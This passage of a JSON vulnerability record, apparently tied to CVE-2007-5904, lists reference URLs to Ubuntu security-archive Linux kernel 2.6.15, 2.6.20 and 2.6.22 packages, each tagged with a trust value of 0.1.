        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-ume_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-server-bigiron_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-xen_2.6.22-15.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx_7.1.0-8.37.6+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-generic-di_2.6.22-15.16_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-powerpc-di_2.6.20-17.12_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-powerpc-smp_2.6.22-15.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-powerpc64-smp_2.6.22-15.39_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5904"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-virtual_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new-dev_100.14.19+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-386_2.6.20-17.12_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-sparc64-di_2.6.22-15.16_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-kernel-source_1.0.9631+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-lpiacompat_2.6.22-15.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-386_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-cell_2.6.22-15.54_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64-smp_2.6.20-17.12_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-17.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-powerpc_2.6.22.4-15.11_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-generic_2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-rt_2.6.22-15.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-dev_1.0.9639+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-powerpc-di_2.6.22-15.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-sparc64-smp_2.6.20.6-17.31_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-xen_2.6.22-15.54_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/avm-fritz-firmware-2.6.20-17_3.11+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-k8_2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-player-kernel-modules-2.6.20-17_2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-generic_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-powerpc64-smp-di_2.6.22-15.39_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-52_3.11+2.6.15.12-52.3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-sparc64_2.6.22-15.39_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-cell_2.6.22-15.54_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc64-smp_2.6.15-52.10_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-powerpc-smp_2.6.15-52.67_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20_2.6.20-17.12.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-firmware-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy-dev_1.0.7184+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-rt_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-52.10.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-386-di_2.6.22-15.39_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-server_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22_2.6.22-15.16.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
